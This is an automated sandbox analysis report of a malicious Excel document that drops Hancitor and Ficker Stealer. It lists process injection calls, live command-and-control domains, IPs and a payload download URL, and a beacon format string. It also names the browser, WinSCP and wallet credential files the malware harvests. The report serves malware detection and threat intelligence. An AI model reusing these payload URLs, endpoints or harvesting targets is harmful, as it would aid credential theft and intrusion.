                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0035201C SetUnhandledExceptionFilter,__encode_pointer,5_2_0035201C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034D00F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034D00F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034B083 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034B083
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034CA9B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034CA9B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040115C SetUnhandledExceptionFilter,exit,7_2_0040115C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401150 SetUnhandledExceptionFilter,7_2_00401150
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004013C9 SetUnhandledExceptionFilter,7_2_004013C9

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pospvisis.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 50.16.239.65 80Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 8.211.241.0 80Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeDomain query: tholeferli.com
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 54.235.88.121 80Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.147.115.74 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDomain query: s0lom0n.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.213.179.67 80Jump to behavior
                  Contains functionality to inject threads in other processesShow sources
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00343880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,5_2_00343880
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNABJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmpBinary or memory string: !Progman
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00356240 cpuid 5_2_00356240
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_00355E13
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,7_2_00415800
                  Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034BDA0 GetSystemTimeAsFileTime,__aulldiv,5_2_0034BDA0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0035073E __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,5_2_0035073E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00341AA0 GetVersion,wsprintfA,wsprintfA,5_2_00341AA0
                  Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected Ficker StealerShow sources
                  Source: Yara matchFile source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2292, type: MEMORY
                  Tries to harvest and steal Bitcoin Wallet informationShow sources
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.jsonJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Tries to steal Instant Messenger accounts or passwordsShow sources
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior

                  Remote Access Functionality:

                  barindex
                  Yara detected Ficker StealerShow sources
                  Source: Yara matchFile source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2292, type: MEMORY
                  Yara detected HancitorShow sources
                  Source: Yara matchFile source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2364, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsScripting32DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsNative API3Boot or Logon Initialization ScriptsProcess Injection212Deobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Scripting32Credentials In Files1System Information Discovery46SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSecurity Software Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion1Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 452590 Sample: 0722_2857746751.xls Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 17 other signatures 2->50 8 EXCEL.EXE 12 34 2->8         started        process3 file4 24 C:\Users\user\AppData\Local\Temp\532.dll, PE32 8->24 dropped 60 Document exploit detected (creates forbidden files) 8->60 12 rundll32.exe 8->12         started        14 imjppdmg.exe 12 8->14         started        signatures5 process6 process7 16 rundll32.exe 9 12->16         started        dnsIp8 26 tholeferli.com 194.147.115.74, 49168, 49170, 49172 MIRHOSTINGRU unknown 16->26 28 s0lom0n.ru 8.211.241.0, 49169, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 16->28 30 3 other IPs or domains 16->30 38 System process connects to network (likely due to code injection or exploit) 16->38 40 May check the online IP address of the machine 16->40 42 Contains functionality to inject threads in other processes 16->42 20 svchost.exe 12 16->20         started        signatures9 process10 dnsIp11 32 pospvisis.com 95.213.179.67, 49173, 49178, 80 SELECTELRU Russian Federation 20->32 34 50.16.239.65, 49171, 80 AMAZON-AESUS United States 20->34 36 3 other IPs or domains 20->36 52 System process connects to network (likely due to code injection or exploit) 20->52 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->54 56 May check the online IP address of the machine 20->56 58 3 other signatures 20->58 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  0722_2857746751.xls30%VirustotalBrowse
                  0722_2857746751.xls22%ReversingLabsScript.Trojan.Wacatac

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\532.dll2%ReversingLabs

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  5.2.rundll32.exe.340000.0.unpack100%AviraTR/Hijacker.GenDownload File

                  Domains

                  SourceDetectionScannerLabelLink
                  pospvisis.com13%VirustotalBrowse
                  s0lom0n.ru1%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://s0lom0n.ru/7hsjfd9w4refsd.exe3%VirustotalBrowse
                  http://s0lom0n.ru/7hsjfd9w4refsd.exe100%Avira URL Cloudmalware
                  http://www.icra.org/vocabulary/.0%URL Reputationsafe
                  http://www.icra.org/vocabulary/.0%URL Reputationsafe
                  http://www.icra.org/vocabulary/.0%URL Reputationsafe
                  http://www.icra.org/vocabulary/.0%URL Reputationsafe
                  http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID0%Avira URL Cloudsafe
                  http://aidgodown.ru/8/forum.php0%VirustotalBrowse
                  http://aidgodown.ru/8/forum.php0%Avira URL Cloudsafe
                  http://tholeferli.com/8/forum.php0%Avira URL Cloudsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://tholeferli.com/8/forum.phponnect0%Avira URL Cloudsafe
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                  http://relifleappin.ru/8/forum.php0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  elb097307-934924932.us-east-1.elb.amazonaws.com
                  		54.235.88.121
                  		truefalse
                    		high
                    pospvisis.com
                    		95.213.179.67
                    		truetrueunknown
                    s0lom0n.ru
                    		8.211.241.0
                    		truetrueunknown
                    tholeferli.com
                    		194.147.115.74
                    		truetrue
                      		unknown
                      api.ipify.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://s0lom0n.ru/7hsjfd9w4refsd.exetrue
                        • 3%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://aidgodown.ru/8/forum.phptrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tholeferli.com/8/forum.phptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://api.ipify.org/false
                          		high
                          http://relifleappin.ru/8/forum.phptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.ipify.org/?format=xmlfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpfalse
                              		high
                              http://www.windows.com/pctv.rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpfalse
                                		high
                                http://investor.msn.comrundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.icra.org/vocabulary/.rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmpfalse
                                      		high
                                      http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUIDrundll32.exe, 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, rundll32.exe, 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://investor.msn.com/rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.%s.comPArundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		low
                                        http://tholeferli.com/8/forum.phponnectrundll32.exe, 00000005.00000002.2348788273.0000000000553000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.hotmail.com/oerundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpfalse
                                          		high
                                          http://api.ipify.orgrundll32.exefalse
                                            		high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            54.235.88.121
                                            		elb097307-934924932.us-east-1.elb.amazonaws.comUnited States
                                            		14618AMAZON-AESUSfalse
                                            50.16.239.65
                                            		unknownUnited States
                                            		14618AMAZON-AESUStrue
                                            8.211.241.0
                                            		s0lom0n.ruSingapore
                                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                            194.147.115.74
                                            		tholeferli.comunknown
                                            		52000MIRHOSTINGRUtrue
                                            95.213.179.67
                                            		pospvisis.comRussian Federation
                                            		49505SELECTELRUtrue

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:452590
                                            Start date:22.07.2021
                                            Start time:16:09:53
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 8m 57s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:0722_2857746751.xls
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • GSI enabled (VBA)
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.phis.troj.spyw.expl.evad.winXLS@9/7@7/5
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 11.4% (good quality ratio 11.1%)
                                            • Quality average: 88.6%
                                            • Quality standard deviation: 21.1%
                                            HCA Information:
                                            • Successful, ratio: 74%
                                            • Number of executed functions: 29
                                            • Number of non-executed functions: 18
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .xls
                                            • Changed system and user locale, location and keyboard layout to English - United States
                                            • Changed system and user locale, location and keyboard layout to Japanese - Japan
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Active ActiveX Object
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtCreateFile calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            16:10:39API Interceptor1x Sleep call for process: imjppdmg.exe modified
                                            16:10:57API Interceptor1308x Sleep call for process: rundll32.exe modified
                                            16:10:59API Interceptor21x Sleep call for process: svchost.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            54.235.88.1210712_4155631572.docGet hashmaliciousBrowse
                                            • api.ipify.org/?format=xml
                                            0712_0838282133.docGet hashmaliciousBrowse
                                            • api.ipify.org/
                                            ter.dllGet hashmaliciousBrowse
                                            • api.ipify.org/?format=xml
                                            50.16.239.65Remittance.htmlGet hashmaliciousBrowse
                                              8.211.241.0532.dllGet hashmaliciousBrowse
                                              • s0lom0n.ru/7hsjfd9w4refsd.exe
                                              0722_5065418752.xlsGet hashmaliciousBrowse
                                              • s0lom0n.ru/7hsjfd9w4refsd.exe
                                              ter.dllGet hashmaliciousBrowse
                                              • min0sra.ru/7t4dfgnmkk7.exe
                                              ier.dllGet hashmaliciousBrowse
                                              • 4a5ikol.ru/7jkio8943wk.exe
                                              0714_2313552213.docGet hashmaliciousBrowse
                                              • 4a5ikol.ru/7jkio8943wk.exe
                                              0714_1242782601.docGet hashmaliciousBrowse
                                              • 4a5ikol.ru/7jkio8943wk.exe
                                              ter.dllGet hashmaliciousBrowse
                                              • 4a5ikol.ru/7jkio8943wk.exe
                                              ter.dllGet hashmaliciousBrowse
                                              • tryffeltinor.ru/7dfgdrttg6.exe
                                              0712_2210055252.docGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              0712_4155631572.docGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              0712_0838282133.docGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              ter.dllGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              0712_2520287506.docGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              0712_5267808768.docGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              0712_0017864438.docGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              0712_3830710356.docGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              2021-07-12-Hancitor-DLL-example-03.dllGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              2021-07-12-Hancitor-DLL-example-05.dllGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              2021-07-12-Hancitor-DLL-example-06.dllGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe
                                              2021-07-12-Hancitor-DLL-example-04.dllGet hashmaliciousBrowse
                                              • pirocont70l.ru/7hjujnfds.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              elb097307-934924932.us-east-1.elb.amazonaws.com532.dllGet hashmaliciousBrowse
                                              • 54.225.245.108
                                              0722_5065418752.xlsGet hashmaliciousBrowse
                                              • 54.243.175.83
                                              U6i3o7E68j.exeGet hashmaliciousBrowse
                                              • 50.16.238.218
                                              9QFzJlxaTl.dllGet hashmaliciousBrowse
                                              • 50.19.92.227
                                              Remittance.htmlGet hashmaliciousBrowse
                                              • 50.16.239.65
                                              0706_1643278086845.docGet hashmaliciousBrowse
                                              • 54.225.78.40
                                              123.dllGet hashmaliciousBrowse
                                              • 50.19.92.227
                                              DDA9.dllGet hashmaliciousBrowse
                                              • 23.21.168.151
                                              4fZX8fJwHn.dllGet hashmaliciousBrowse
                                              • 54.235.190.106
                                              Drawing for New Purchase Order.exeGet hashmaliciousBrowse
                                              • 23.21.224.49
                                              triage_dropped_file.dllGet hashmaliciousBrowse
                                              • 54.243.175.83
                                              265.exeGet hashmaliciousBrowse
                                              • 54.243.175.83
                                              7QC4uSmZCg.exeGet hashmaliciousBrowse
                                              • 54.225.78.40
                                              ter.dllGet hashmaliciousBrowse
                                              • 23.21.224.49
                                              WSn11SBJ55.dllGet hashmaliciousBrowse
                                              • 50.16.216.118
                                              aIY9sQv1qW.exeGet hashmaliciousBrowse
                                              • 23.21.224.49
                                              ier.dllGet hashmaliciousBrowse
                                              • 23.21.173.155
                                              0714_2313552213.docGet hashmaliciousBrowse
                                              • 54.225.165.85
                                              0714_1242782601.docGet hashmaliciousBrowse
                                              • 54.225.165.85
                                              T20009002.exeGet hashmaliciousBrowse
                                              • 54.225.78.40
                                              pospvisis.com532.dllGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0722_5065418752.xlsGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              ter.dllGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              ier.dllGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0714_2313552213.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0714_1242782601.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              ter.dllGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_2210055252.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_4155631572.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_0838282133.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              ter.dllGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_2520287506.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_5267808768.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_0017864438.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_3830710356.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              2021-07-12-Hancitor-DLL-example-03.dllGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              2021-07-12-Hancitor-DLL-example-05.dllGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              2021-07-12-Hancitor-DLL-example-04.dllGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_2172200614.docGet hashmaliciousBrowse
                                              • 95.213.179.67
                                              0712_3006077542.docGet hashmaliciousBrowse
                                              • 95.213.179.67

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AMAZON-AESUS532.dllGet hashmaliciousBrowse
                                              • 54.225.245.108
                                              0722_5065418752.xlsGet hashmaliciousBrowse
